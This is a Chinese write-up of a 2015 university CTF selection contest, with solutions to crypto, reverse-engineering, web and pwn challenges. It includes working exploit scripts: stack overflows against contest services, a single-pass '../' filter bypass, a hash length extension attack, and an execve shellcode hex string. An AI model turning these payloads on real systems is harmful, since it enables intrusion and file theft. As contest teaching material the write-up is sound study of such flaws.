网络空间安全实验班选拔赛WRITE-UP

网络空间安全实验班选拔赛WRITE-UP

@(writeup)[Th1nk|Bigtang|2015-06-07]

###1# FirstBlood 96/680 20

修改口号为FirstBl00d,抢第一个flag~~~

右键查看源码,发现提供了修改口号的接口

<!-- NOTE(review): the commented-out route inside the blockquote below is still delivered to every client in the page source; an HTML comment hides nothing, so unpublished endpoints must not be left in markup. -->
<div id="myInfo" class="reveal-modal" style="display: none;">
    <h2>我的信息</h2>
    <blockquote>
      <p>队伍名称:测试用户</p>
      <p>口号:FirstBl00d</p>
      <!-- index.php/user/updatevoice?voice= -->
      <p>分数: 300</p>
      <p>已找到的FLAG: 3</p>
    </blockquote>
    <a class="close-reveal-modal">&#215;</a>
</div>

访问 http://ctf.xidian.edu.cn/index.php/user/updatevoice?voice=FirstBl00d 即可

###2# 十六进制字符串 137/655 20

这是一个十六进制的字符串,解开后就知道flag在哪里了
666c61675f69735f686572657b3265346231303234613763386
3353432373139633637613064666333663432302e7068707d

# Python 2 only: str.decode("hex") was removed in Python 3, where bytes.fromhex(...) does the same job.
"666c61675f69735f686572657b32653462313032346137633863353432373139633637613064666333663432302e7068707d".decode("hex")
'flag_is_here{2e4b1024a7c8c542719c67a0dfc3f420.php}'

访问 http://ctf.xidian.edu.cn:8888/crypto/hex/2e4b1024a7c8c542719c67a0dfc3f420.php

###3# AES解密 111/317 25

这是一个AES加密的字符串,密钥已经给你了。解开后就知道flag在哪里了 Ciphertext:U2FsdGVkX19k/4EAL3YRk/vhS1M1IynAj+M+VNj2I7l3Li2Mlr7
/OQboOf5akTBdbDTLq4sVwsBx4U7XGgj0ZgUtJyR0zOB7o7gb6b9a4ao=
Key:bigtang

高级加密标准AES在线工具(密文开头的 U2FsdGVkX1 是 "Salted__" 的 Base64 编码,即 OpenSSL/CryptoJS 的口令加密格式,因此这里的 Key 是口令,而不是原始 AES 密钥)
flag_is_here{64316e20808e3596d7ea71a6ece5c6b3.php}

4# caesar 82/156 25

mshn_pz_olyl{432842233j8m1il4028432151l1h57ml.wow}

CAESAR Shift Code
flag_is_here{432842233c8f1be4028432151e1a57fe.php}

###5# DES解密 77/149 25

Ciphertext:683b32b9f57025220869431027e4946b044a900c5d3fb01e8
6c68f835ff58f02202eb5b42e083f2bce4768274a592720f5337ebe36b70e7e
key:xdsecsec

DES ECB hex
DES解密
flag is in 5371c64364510f6aad8519743f185c75.php

###7# 一段被加密了的js 62/117 25

http://ctf.xidian.edu.cn:8888/crypto/js/js.php
Chrome浏览器,打开开发者工具,运行可得
"flag_is_here{c88e4f8865b23a793bab1e3aa2f1153b.php}"

###10# 你抓住了么 21/121 35

http://ctf.xidian.edu.cn:8888/web/js/index.php

index.html中有段js控制跳转,关闭javascript,访问index.html
flag:6d06d2ce7c25c4c2cbcc09c03ef9ab37.php

###15# re0 8/44 50

// bigtang
#include <stdio.h>
#include <string.h>

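/*
 * re0: read one token from stdin and compare it with a 32-character
 * string embedded in the binary.
 *
 * Returns 1 when no token can be read or its length is not 32, and 0
 * otherwise (whether or not the comparison succeeded).
 *
 * The expected value is stored in the binary as a plain string, so a
 * comparison against it does not keep that value secret from anyone who
 * can inspect the file.
 */
int main()
{
    char enc[] = "1bb2e9807bece13cccf247adbcc6a194";
    char text[64];

    printf("SO EASY\n");
    printf("input:");
    /* Bound the read to the buffer: a bare %s would write past text[64]
       on long input, and an unchecked failure would leave text unset. */
    if (scanf("%63s", text) != 1)
    {
        printf("Wrong~~~!\n");
        return 1;
    }
    if (strlen(text) != 32)
    {
        printf("Wrong~~~!\n");
        return 1;
    }

    if (strncmp(text, enc, 32) == 0)
    {
        printf("flag is CTF{%s}\n", text);
    }
    else
    {
        printf("Try again~!\n");
    }

    return 0;
}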

ida反编译main函数
CTF{1bb2e9807bece13cccf247adbcc6a194}

22# 汇编指令 5/13 60

写出下面汇编指令对应的机器码,以十六进制形式给出(31c0...)

http://shell-storm.org/shellcode/files/shellcode-806.php
31c048bbd19d9691d08c97ff48f7db53545f995257545eb03b0f05

24# pwn0 2/5 80

溢出第0题
nc ctf.xidian.edu.cn 23333

#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>

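/*
 * Print the two-line greeting to stdout.
 *
 * Lengths are taken from the literals with sizeof - 1 so the terminating
 * NUL is never sent; a hand-counted 34 for the first line is one more than
 * its 33 characters and puts a stray '\0' on the wire.
 */
void welcome()
{
    static const char banner[] = "Welcome to XDSEC's login system!\n";
    static const char prompt[] = "Please input your name and I will check it!\n";

    write(STDOUT_FILENO, banner, sizeof(banner) - 1);
    write(STDOUT_FILENO, prompt, sizeof(prompt) - 1);
}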

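/*
 * Send the contents of flag.txt (at most 40 bytes) to stdout.
 *
 * Does nothing when the file cannot be opened or nothing can be read.
 */
void get_flag()
{
        int fd;
        ssize_t ret;
        char buffer[40];

        fd = open("flag.txt",O_RDONLY);
        if (fd < 0)
        {
                return;
        }
        ret = read(fd,buffer,sizeof(buffer));
        /* The descriptor is no longer needed once the bytes are in buffer. */
        close(fd);
        /* Write exactly the bytes read: read() does not NUL-terminate, so
           strlen(buffer) could run past the end of the array. */
        if (ret > 0)
        {
                write(STDOUT_FILENO,buffer,(size_t)ret);
        }
}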

/*
 * Prompt for a name and call get_flag() when the first 7 bytes of the input
 * equal "bigtang" and auth equals 0x61626364.
 *
 * auth is initialised to 0 and never assigned afterwards, so the inner
 * condition cannot hold through the normal data flow. The read() below
 * accepts up to 100 bytes into the 64-byte name buffer, which is the defect
 * this challenge is built around.
 *
 * NOTE(review): bounding the read to sizeof(name) removes the overflow;
 * compiler stack protection is only a second line of defence.
 */
void vuln()
{
    int auth = 0;
        char name[64];
        char text[] = "bigtang";
        
        write(STDOUT_FILENO,"Show me :",9);
        /* Up to 100 bytes into a 64-byte buffer: the excess lands on whatever
           the compiler placed after name, presumably text and auth here;
           confirm against the binary. */
        read(STDIN_FILENO,name,100);

        /* Only the first 7 bytes are compared, so trailing input is ignored. */
        if (strncmp(name,text,7)==0)
        {
                /* 0x61626364 is "abcd" in ASCII; on a little-endian target
                   (assumed) its bytes in memory are 'd','c','b','a'. */
                if (auth == 0x61626364)
                {
                        get_flag();
                }
        }
        else
        {
            write(STDOUT_FILENO,"Who are you?\n",13);
        }
}

/* Entry point: print the greeting, run the name check, exit with status 0. */
int main() {
    welcome();
    vuln();

    return 0;
}

邻接变量覆盖:read 向 64 字节的 name 最多读入 100 字节,超出的部分会覆盖相邻的栈变量 auth。exp如下

from zio import *

# Python 2 client built on the third-party zio library (imported above with
# `from zio import *`); it talks to the pwn0 service whose source is shown
# earlier on this page.
host = "ctf.xidian.edu.cn"
port = 23333
io = zio((host,port))
# Wait for the prompt that vuln() writes before sending anything.
io.read_until("Show me :")
# 7 bytes "bigtang" satisfy the strncmp, 69 filler bytes bring the total to 76,
# and "dcba" is 0x61626364 in little-endian byte order.
# NOTE(review): the 76-byte offset depends on how this particular binary was
# compiled; it cannot be derived from the C source alone.
io.writeline("bigtang"+'1'*69 + "dcba")
# Hand the connection over to the terminal so the service's reply is visible.
io.interact()

key is 91c96cafbe59b36feca8bf48fe4df709

27# re1 6/42 100

#include <stdio.h>
#include <string.h>

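/*
 * re1: read one token from stdin and accept it when text[i] ^ i equals
 * enc[i] for every i in 0..31.
 *
 * Returns 1 on a read failure, a length other than 32 or the first
 * mismatching byte; returns 0 after printing the flag line.
 *
 * XOR with a known index is reversible, so the table stored in the binary
 * is an encoding of the expected input, not a secret.
 */
int main()
{
    char enc[] = {0x37,0x39,0x33,0x35,0x62,0x64,0x3f,0x64,0x6b,0x3f,0x33,0x68,0x3d,0x38,0x39,0x38,0x75,0x25,0x76,0x27,0x76,0x74,0x26,0x76,0x7e,0x7d,0x2e,0x7d,0x78,0x2e,0x2c,0x7b};
    char text[64];
    int i;

    printf("JUST REVERSE ME!\n");
    printf("input:");
    /* Bound the read to the buffer: a bare %s would write past text[64]
       on long input, and an unchecked failure would leave text unset. */
    if (scanf("%63s", text) != 1)
    {
        printf("Wrong~~~!");
        return 1;
    }
    if (strlen(text) != 32)
    {
        printf("Wrong~~~!");
        return 1;
    }

    for (i = 0; i < 32; i++)
    {
        if ((text[i] ^ i) != enc[i])
        {
            printf("Wrong~~~!");
            return 1;
        }
    }

    /* Reaching this point means all 32 positions matched, so no separate
       match counter is needed. */
    printf("flag is CTF{%s}", text);
    return 0;
}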

异或加密,没啥说的,看代码吧

28# Web.py1 7/10 100

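过滤可绕过:对 flag 的检查发生在删除 ../ 之前,而且 replace 只执行一遍,所以真正传给 open() 的路径并不是被检查过的那个路径。修复方式是先把路径规范化,再校验它仍位于 uploads 目录内。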

def GET(self, filepath):
        """Return the bytes of ``./uploads/<filepath>`` or a not-found response.

        NOTE(review): the two filters below do not confine the path to
        ``./uploads``. The "flag" test runs on the raw input while the
        ``../`` removal runs afterwards, so the string that reaches
        ``open()`` is not the string that was checked; and ``replace`` makes
        a single pass, so its output can itself contain ``../``. Resolve the
        joined path first (e.g. ``os.path.realpath``) and verify the result
        is still under the uploads directory before opening it.
        """
        if filepath.find("flag")>-1: # reject paths containing "flag"
            return "Goodbye Hackers"
        # guard against reading outside the directory
        filepath = filepath.replace("../","") # strip ../ (one pass, not repeated)
        try:
            with open("./uploads/%s" % filepath, "rb") as f:
                content = f.read()
            return content
        except: # NOTE(review): bare except also reports permission and I/O errors as "not found"
            return web.notfound("Sorry, the file you were looking for was not found.")

exp

## bigtang
from requests import get

def get_flag():
        """Request the crafted path under /uploads/ and return the response body.

        The path relies on the handler's single-pass ``../`` removal running
        after its "flag" check; a handler that canonicalises the path before
        validating it would reject this request.
        """
        base = "http://ctf.xidian.edu.cn:8080/uploads/"
        response = get(base + ".../...//.../...//fla../g.txt")
        return response.content

# Python 2 entry point (print statement): fetch the response body and show it.
if __name__ == "__main__":
        flag = get_flag()
        print "[*] flag :" + flag

30# pwn1 1/3 150

栈溢出,怕时间不够,读取文件的shellcode也写在里面了。只需覆盖返回地址为读文件函数的地址。

## bigtang ##
from zio import *

# Python 2 / zio client for the pwn1 service. The challenge binary is not
# shown on this page, so the offset and address below cannot be checked here.
host = "ctf.xidian.edu.cn"
port = 6666
io = zio((host,port))
# First prompt: any number is sent; the script uses "100".
io.read_until("Please tell me your lucky number:")
io.writeline("100")

# Hard-coded code address of the binary's own file-reading routine.
# NOTE(review): a fixed address only works when the binary is loaded at a
# known base, presumably built without PIE; confirm.
read_flag = 0x40067e
io.read_until("Please say something about your story:")
# 0x58 filler bytes followed by the address packed as a little-endian 64-bit
# value (zio's l64).
# NOTE(review): presumably 0x58 is the distance from the buffer to the saved
# return address with no stack canary in between; a bounded read and
# -fstack-protector are the corresponding fixes. Confirm against the binary.
io.writeline("1"*0x58+l64(read_flag))
io.interact()

31# re2 5/21 150

看代码

/*
 * Validate a username/password pair.
 *
 * Returns 0 when the pair is accepted and 1 otherwise. The password must
 * start with a fixed 16-character prefix, carry fixed characters at
 * positions 16, 18 and 20..28 plus 30, and repeat username[0] at position
 * 17 and username[4] at positions 19, 29 and 31.
 *
 * Nothing here checks buffer lengths: username[4] and password[31] are
 * read once the prefix matches, so the caller has to supply buffers that
 * long.
 */
int gogogo(char username[],char password[])
{
    /* Fixed characters, listed in the order they are tested. */
    static const struct { int pos; char want; } fixed[] = {
        {18, '0'}, {27, '0'},
        {20, '4'}, {25, '4'}, {28, '4'}, {30, '4'},
        {16, '7'},
        {21, '3'},
        {22, '1'}, {26, '1'},
        {23, '6'},
        {24, '5'}
    };
    size_t k;

    if (strncmp(password, "e38567689dcc9d2d", 16) != 0)
        return 1;

    if (password[17] != username[0])
        return 1;

    if (!(username[4] == password[31] &&
          username[4] == password[29] &&
          username[4] == password[19]))
        return 1;

    for (k = 0; k < sizeof(fixed) / sizeof(fixed[0]); k++)
    {
        if (password[fixed[k].pos] != fixed[k].want)
            return 1;
    }

    return 0;
}

用od好好调试
CTF{e38567689dcc9d2d7b0a431654104a4a}

34# Web.py2 200

哈希长度扩展攻击:(推测)服务端的 mac 是对"密钥+filepath"直接做哈希,只要已知一组合法的(数据, mac),就能为追加了后缀的数据算出合法的 mac;改用 HMAC 可以避免这个问题。

## bigtang
from hashpumpy import hashpump
from base64 import b64encode,b64decode
from requests import get,Session


def get_flag():
        """Fetch the signed link from /read/index and replay it with an extended message.

        Python 2 code (print statements, str used as bytes). Relies on the
        third-party ``hashpumpy`` and ``requests`` packages imported above.

        NOTE(review): this only works if the server derives ``mac`` by hashing
        a secret placed directly in front of the data, presumably
        hash(secret + filepath); with that construction one valid
        (data, mac) pair is enough to compute a valid mac for the same data
        with a suffix appended. Using an HMAC over the path, and canonicalising
        the decoded path before opening it, addresses both weaknesses.
        """
        # Browser-like request headers sent with every request of the session.
        headers = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                'Accept-Encoding': 'gzip, deflate, compress',
                'Accept-Language': 'en-us;q=0.5,en;q=0.3',
                'Cache-Control': 'max-age=0',
                'Connection': 'keep-alive',
                'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0'}

        s = Session()
        s.headers.update(headers)
        url = "http://107.170.204.123:8088/read/index"
        link =  s.get(url).content
        # The page body carries a link with a base64 filepath and its mac; both
        # are cut out by substring position, so any change in the page layout
        # breaks this parsing.
        filepath = link[link.index("filepath=")+9:link.index("&")]
        mac = link[link.index("mac=")+4:link.index("Link")-2]
        print "[*] filepath: " + b64decode(filepath)
        print "[*] mac     : " + mac

        # hashpump(known_mac, known_data, data_to_append, key_length)
        # returns (new_mac, new_message).
        # assumes the signed data is "test.txt" and the secret is 16 bytes long; TODO confirm
        new_mac = hashpump(mac,"test.txt","////////../../../../../../home/webpy2/flag.txt",16)
        print "[*] payload : " + b64encode(new_mac[1])
        print "[*] new_mac : " + new_mac[0]

        # Replay the request with the extended message and its recomputed mac.
        new_url = url + "?filepath=" + b64encode(new_mac[1]) + "&mac=" + new_mac[0]
        flag = s.get(new_url).content
        return flag

# Python 2 entry point (print statement): run the request sequence and show the reply.
if __name__ == "__main__":
        flag = get_flag()
        print "[+] flag    : " + flag

[+] flag : Flag is in http://ctf.xidian.edu.cn:8888/web/webpy2/811cf8a2a72781ef04d50400d9cfd276.php
